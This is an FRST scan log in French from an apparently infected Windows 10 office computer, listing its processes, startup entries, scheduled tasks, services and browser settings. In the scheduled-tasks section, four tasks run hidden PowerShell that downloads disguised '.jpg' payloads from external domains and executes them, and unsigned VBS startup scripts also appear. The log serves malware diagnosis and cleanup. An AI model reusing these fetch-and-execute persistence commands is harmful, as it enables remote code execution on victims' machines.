Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 04-06-2022 01
Exécuté par BUREAU DU MAS (administrateur) sur DESKTOP-DORMAGC (LENOVO 1577G3G) (05-06-2022 18:05:53)
Exécuté depuis C:\Users\BUREAU DU MAS\Desktop
Profils chargés: BUREAU DU MAS
Plate-forme: Microsoft Windows 10 Professionnel Version 21H1 19043.1706 (X64) Langue: Français (France)
Navigateur par défaut: Chrome
Mode d'amorçage: Normal

==================== Processus (Avec liste blanche) =================

(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)

(C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe <4>
(C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\splwow64.exe
(C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe ->) (McAfee, Inc. -> McAfee LLC.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe ->) (McAfee, Inc. -> McAfee, LLC) C:\Windows\System32\mfevtps.exe
(C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe
(C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe
(C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe
(C:\Program Files\McAfee\WebAdvisor\servicehost.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\uihost.exe
(C:\Program Files\NVIDIA Corporation\Display\nvtray.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(cmd.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MSC\MfeBrowserHost.exe <2>
(cmd.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\browserhost.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <37>
(explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
(explorer.exe ->) (SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\Epson Software\Download Navigator\EPSDNMON.EXE
(explorer.exe ->) (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIKEE.EXE <2>
(explorer.exe ->) (SonicWall) [Fichier non signé] C:\Program Files (x86)\SonicWall\SSL-VPN\NetExtender\NEGui.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <7>
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <2>
(nvvsvc.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXRCV.exe
(SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe
(services.exe ->) (McAfee, Inc. -> McAfee, LLC) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(services.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\CSP\5.1.104.0\McCSPServiceHost.exe
(services.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe <3>
(services.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
(services.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\VSCore_22_2\mcapexe.exe
(services.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\servicehost.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe <2>
(services.exe ->) (SEIKO EPSON Corporation -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(services.exe ->) (SonicWall Inc.) [Fichier non signé] C:\Program Files (x86)\SonicWall\SSL-VPN\NetExtender\NEService64.exe
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(svchost.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(svchost.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MQS\QcShm.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2204.13303.0_x64__8wekyb3d8bbwe\Cortana.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe

==================== Registre (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)

HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-11-14] (NVIDIA Corporation -> NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\nvspcap64.dll [1767712 2016-11-14] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Fichier non signé]
HKLM\...\Run: [SonicWallNetExtender] => C:\Program Files (x86)\SonicWall\SSL-VPN\NetExtender\NEGui.exe [3563520 2018-01-05] (SonicWall) [Fichier non signé]
HKLM-x32\...\Run: [FUFAXRCV] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXRCV.exe [671120 2022-03-03] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [FUFAXSTM] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe [896400 2022-03-03] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
HKU\S-1-5-21-3818313502-2494511162-3174529094-1001\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATIKEE.EXE [298560 2013-09-12] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
HKU\S-1-5-21-3818313502-2494511162-3174529094-1001\...\Run: [EPLTarget\P0000000000000001] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATIKEE.EXE [298560 2013-09-12] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
HKU\S-1-5-21-3818313502-2494511162-3174529094-1001\...\Run: [EPSDNMON] => C:\Program Files (x86)\Epson Software\Download Navigator\EPSDNMON.EXE [346712 2020-07-27] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKU\S-1-5-21-3818313502-2494511162-3174529094-1001\...\Run: [MicrosoftEdgeAutoLaunch_E0C2784C19C686CA4271FE7D86A1002F] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3595192 2022-06-03] (Microsoft Corporation -> Microsoft Corporation)
HKLM\...\Windows x64\Print Processors\hpzppw71: C:\Windows\System32\spool\prtprocs\x64\hpzppw71.dll [239704 2017-12-18] (Microsoft Windows Hardware Compatibility Publisher -> Hewlett-Packard Corporation)
HKLM\...\Print\Monitors\EPSON WF-3620 Series 64MonitorBE: C:\WINDOWS\system32\E_YLMBKEE.DLL [179712 2013-10-22] (Microsoft Windows Hardware Compatibility Publisher -> SEIKO EPSON CORPORATION)
HKLM\...\Print\Monitors\EpsonNet Print Port: C:\WINDOWS\system32\enppmon.dll [558592 2012-11-12] (SEIKO EPSON CORPORATION) [Fichier non signé]
HKLM\...\Print\Monitors\PCL hpz3lw71: C:\WINDOWS\system32\hpz3lw71.dll [55392 2017-12-18] (Microsoft Windows Hardware Compatibility Publisher -> Hewlett-Packard Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\102.0.5005.63\Installer\chrmstp.exe [2022-06-01] (Google LLC -> Google LLC)
Startup: C:\Users\BUREAU DU MAS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dmlstl.VBS [2022-05-04] () [Fichier non signé]

==================== Tâches planifiées (Avec liste blanche) ============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {20C9A3CF-955F-4C2E-AD2A-9A1A8FF22F2D} - System32\Tasks\EPSON WF-3620 Series Update {0A8F8332-DD2E-47C1-84EF-9EEF7180195C} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [679488 2013-02-28] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
Task: {22D33687-DB97-465E-91EE-88E87C4D7315} - System32\Tasks\Unlimited => C:\ProgramData\Unlimited\ISO\Unlimited.vbs [207 2022-05-11] () [Fichier non signé]
Task: {251E9B30-9694-4842-B118-7496CDEA2038} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155432 2019-10-11] (Google Inc -> Google LLC)
Task: {4196150C-7D1B-4212-B97B-72FCA87CEFA0} - System32\Tasks\Error => C:\ProgramData\Error\ISO\Error.vbs [12395 2022-06-05] () [Fichier non signé]
Task: {580E8EF5-B106-4933-A9C4-749F76D801FD} - System32\Tasks\EPSON WF-3620 Series Update {A26E3EDB-B1E6-4AD7-AADE-1B9FCCB3AB36} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [679488 2013-02-28] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
Task: {5B4F06C3-510E-4F15-BA22-8500CCF7E562} - System32\Tasks\EPSON WF-3620 Series Invitation {A26E3EDB-B1E6-4AD7-AADE-1B9FCCB3AB36} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [679488 2013-02-28] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
Task: {6D337A76-BA1D-47FC-A9F0-70128E763F11} - System32\Tasks\Turismo => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/tur/turismo.jpg"" -useB|iex;
Task: {902C12DD-7B19-4CBB-8F63-A81E977E6DD5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155432 2019-10-11] (Google Inc -> Google LLC)
"C:\Windows\System32\Tasks\McAfee\McAfee Idle Detection Task" a été déverrouillé. <==== ATTENTION
Task: {A525FC89-4583-474D-9CCF-9F9FEAD43E32} - System32\Tasks\McAfee\McAfee Idle Detection Task => {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [926064 2022-02-18] (McAfee, LLC -> McAfee, LLC)
Task: {B5F69BC6-8276-4CCF-B563-17357C581AC2} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent => {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [926064 2022-02-18] (McAfee, LLC -> McAfee, LLC)
Task: {CB425767-D91C-4BD6-BC96-495375A83BD4} - System32\Tasks\HomeOffice => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/booking.jpg"" -useB|iex;
Task: {D200D697-F3D8-480F-A9D6-A8339ED0F302} - System32\Tasks\McAfee\McAfee DAT Built in test => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.12.663\mcdatrep.exe [1889696 2021-01-07] (McAfee, Inc. -> McAfee, LLC.)
Task: {D29FA4EF-A5D1-4C83-AE84-569FBDE99CDD} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [768288 2022-03-24] (McAfee, LLC -> McAfee, LLC)
Task: {E022830E-8C34-429E-96A0-D99407D83010} - System32\Tasks\CCleanData => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://skynetx.com.br/booking.jpg"" -useB|iex;
Task: {E75D26A5-D341-4F6E-BA94-6F35AF2247B2} - System32\Tasks\McAfee\DAD.Execute.Updates => C:\Program Files\Common Files\McAfee\DynamicAppDownloader\DADUpdater.exe [4089168 2022-02-08] (McAfee, LLC -> McAfee, LLC)
Task: {F8E3FA99-9FCE-45BC-BACA-0A6CD7143FCE} - System32\Tasks\AudioHD32 => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/booking.jpg"" -useB|iex;
Task: {FFC1FFFE-669D-47B6-BC29-6AF7352B7F17} - System32\Tasks\EPSON WF-3620 Series Invitation {0A8F8332-DD2E-47C1-84EF-9EEF7180195C} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [679488 2013-02-28] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)

Task: C:\WINDOWS\Tasks\EPSON WF-3620 Series Invitation {0A8F8332-DD2E-47C1-84EF-9EEF7180195C}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE
Task: C:\WINDOWS\Tasks\EPSON WF-3620 Series Invitation {A26E3EDB-B1E6-4AD7-AADE-1B9FCCB3AB36}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE
Task: C:\WINDOWS\Tasks\EPSON WF-3620 Series Update {0A8F8332-DD2E-47C1-84EF-9EEF7180195C}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE:/EXE:{0A8F8332-DD2E-47C1-84EF-9EEF7180195C} /F:UpdateWORKGROUP\DESKTOP-DORMAGC$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\WINDOWS\Tasks\EPSON WF-3620 Series Update {A26E3EDB-B1E6-4AD7-AADE-1B9FCCB3AB36}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE:/EXE:{A26E3EDB-B1E6-4AD7-AADE-1B9FCCB3AB36} /F:UpdateWORKGROUP\DESKTOP-DORMAGC$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{ab3fd692-225c-47ff-87e0-9c542a404191}: [DhcpNameServer] 192.168.1.1

Edge:
=======
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
Edge DefaultProfile: Default
Edge Profile: C:\Users\BUREAU DU MAS\AppData\Local\Microsoft\Edge\User Data\Default [2022-06-05]
Edge Extension: (True Key™ by McAfee) - C:\Users\BUREAU DU MAS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\gnnbmcifkkjgjdbkilfglpdpmidkgefn [2022-05-21]
Edge Profile: C:\Users\BUREAU DU MAS\AppData\Local\Microsoft\Edge\User Data\Guest Profile [2021-12-04]

FireFox:
========
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi
FF Extension: (McAfee® WebAdvisor) - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi [2022-06-03] [UpdateUrl:hxxps://sadownload.mcafee.com/products/SA/Win/xpi/webadvisor/update.json]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi
FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\McAfee\MSC\npMcSnFFPl64.dll [2022-03-29] (McAfee, LLC -> )
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\MSC\npMcSnFFPl.dll [2022-03-29] (McAfee, LLC -> )
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-11-14] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Fichier non signé]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-11-14] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Fichier non signé]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\BUREAU DU MAS\AppData\Local\Google\Chrome\User Data\Default [2022-06-05]
CHR Notifications: Default -> hxxps://business.facebook.com; hxxps://www.aidetechniqueauto.fr; hxxps://www.epson.co.uk; hxxps://www.epson.fr; hxxps://www.legisocial.fr; hxxps://www.thaiairways.com
CHR NewTab: Default -> Not-active:"chrome-extension://kbmkambfpkcpoaalgilkfdgjenkjfhio/ntp1.html"
CHR DefaultSearchURL: Default -> hxxps://fr.search.yahoo.com/search?fr=mcafee&type=E211FR885G0&p={searchTerms}
CHR DefaultSearchKeyword: Default -> mcafee
CHR DefaultSuggestURL: Default -> hxxps://fr.search.yahoo.com/sugg/gossip/gossip-fr-partner?output=fxjson&appid=mca&source=yahoo_mcafee_searchassist&command={searchTerms}
CHR Extension: (McAfee® WebAdvisor) - C:\Users\BUREAU DU MAS\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2022-05-10]
CHR Extension: (QuickTemplateFinder) - C:\Users\BUREAU DU MAS\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmkambfpkcpoaalgilkfdgjenkjfhio [2021-04-23]
CHR Extension: (McAfee® Web Boost) - C:\Users\BUREAU DU MAS\AppData\Local\Google\Chrome\User Data\Default\Extensions\klekeajafkkpokaofllcadenjdckhinm [2022-02-25]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\BUREAU DU MAS\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Profile: C:\Users\BUREAU DU MAS\AppData\Local\Google\Chrome\User Data\Guest Profile [2019-11-11]
CHR Profile: C:\Users\BUREAU DU MAS\AppData\Local\Google\Chrome\User Data\System Profile [2022-03-26]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]
CHR HKLM\...\Chrome\Extension: [klekeajafkkpokaofllcadenjdckhinm]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]
CHR HKLM-x32\...\Chrome\Extension: [klekeajafkkpokaofllcadenjdckhinm]

==================== Services (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [144560 2012-05-17] (SEIKO EPSON Corporation -> Seiko Epson Corporation)
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [805808 2022-06-03] (McAfee, LLC -> McAfee, LLC)
R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_22_2\McApExe.exe [816696 2022-03-24] (McAfee, LLC -> McAfee, LLC)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\5.1.104.0\\McCSPServiceHost.exe [3378048 2022-02-17] (McAfee, LLC -> McAfee, LLC)
S3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [1217800 2022-02-04] (McAfee, Inc. -> McAfee, LLC)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [1217800 2022-02-04] (McAfee, Inc. -> McAfee, LLC)
R3 mfevtp; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [1217800 2022-02-04] (McAfee, Inc. -> McAfee, LLC)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1546144 2022-03-04] (McAfee, LLC -> McAfee, LLC)
R2 PEFService; C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe [4235968 2022-02-19] (McAfee, LLC -> McAfee, LLC)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6254856 2022-05-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 SONICWALL_NetExtender; C:\Program Files (x86)\SonicWall\SSL-VPN\NetExtender\NEService64.exe [767488 2018-01-05] (SonicWall Inc.) [Fichier non signé]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1909.6-0\NisSrv.exe [3004048 2019-10-12] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1909.6-0\MsMpEng.exe [103384 2019-10-12] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Pilotes (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Fichier non signé]
S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [Fichier non signé]
R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [72224 2022-02-09] (McAfee, Inc. -> McAfee, LLC)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus2.sys [160376 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [469528 2022-02-09] (McAfee, Inc. -> McAfee, LLC)
R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [344088 2022-02-09] (McAfee, Inc. -> McAfee, LLC)
S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [83400 2022-02-09] (Microsoft Windows Early Launch Anti-malware Publisher -> McAfee, LLC)
R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [439320 2022-02-09] (McAfee, Inc. -> McAfee, LLC)
R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [911904 2022-02-09] (McAfee, Inc. -> McAfee, LLC)
R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [645656 2022-02-10] (McAfee, Inc. -> McAfee LLC.)
S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [111136 2022-02-10] (McAfee, Inc. -> McAfee LLC.)
R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [107040 2022-02-09] (McAfee, Inc. -> McAfee, LLC)
R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [228888 2022-02-09] (McAfee, Inc. -> McAfee, LLC)
R3 NxDrv; C:\WINDOWS\System32\drivers\NxDrv.sys [34696 2018-01-05] (SonicWall Inc. -> SonicWall Inc.)
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [167544 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [46688 2019-10-12] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [350136 2019-10-12] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [54200 2019-10-12] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

==================== Un mois (créés) (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2022-06-05 18:05 - 2022-06-05 18:07 - 000024421 _____ C:\Users\BUREAU DU MAS\Desktop\FRST.txt
2022-06-05 18:05 - 2022-06-05 18:03 - 002368000 _____ (Farbar) C:\Users\BUREAU DU MAS\Desktop\FRST64.exe
2022-06-05 18:04 - 2022-06-05 18:06 - 000000000 ____D C:\FRST
2022-06-05 18:04 - 2022-06-05 18:04 - 002368000 _____ (Farbar) C:\Users\BUREAU DU MAS\Downloads\FRST64 (1).exe
2022-06-05 18:04 - 2022-06-05 18:04 - 000000000 ___HD C:\$MfeDeepRem
2022-06-05 18:03 - 2022-06-05 18:03 - 002368000 _____ (Farbar) C:\Users\BUREAU DU MAS\Downloads\FRST64.exe
2022-06-05 15:43 - 2022-06-05 15:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2022-06-04 15:06 - 2022-06-04 15:06 - 000009160 _____ C:\Users\BUREAU DU MAS\Downloads\dpae (12).pdf
2022-06-04 14:36 - 2022-06-04 14:36 - 000009170 _____ C:\Users\BUREAU DU MAS\Downloads\dpae (11).pdf
2022-06-02 10:44 - 2022-06-02 10:45 - 000344789 _____ C:\Users\BUREAU DU MAS\Downloads\ae-1713310169.pdf
2022-06-02 10:40 - 2022-06-02 10:40 - 000345413 _____ C:\Users\BUREAU DU MAS\Downloads\ae-1713309181.pdf
2022-05-27 16:25 - 2022-05-27 16:25 - 000069931 _____ C:\Users\BUREAU DU MAS\Downloads\Fiche-de-paie-type-1.xlsx
2022-05-25 16:55 - 2022-05-25 16:55 - 000064320 _____ C:\Users\BUREAU DU MAS\Downloads\doc21.pdf
2022-05-25 16:54 - 2022-05-25 16:54 - 000063961 _____ C:\Users\BUREAU DU MAS\Downloads\doc62.pdf
2022-05-19 22:03 - 2022-05-20 15:57 - 000003854 _____ C:\WINDOWS\system32\Tasks\AudioHD32
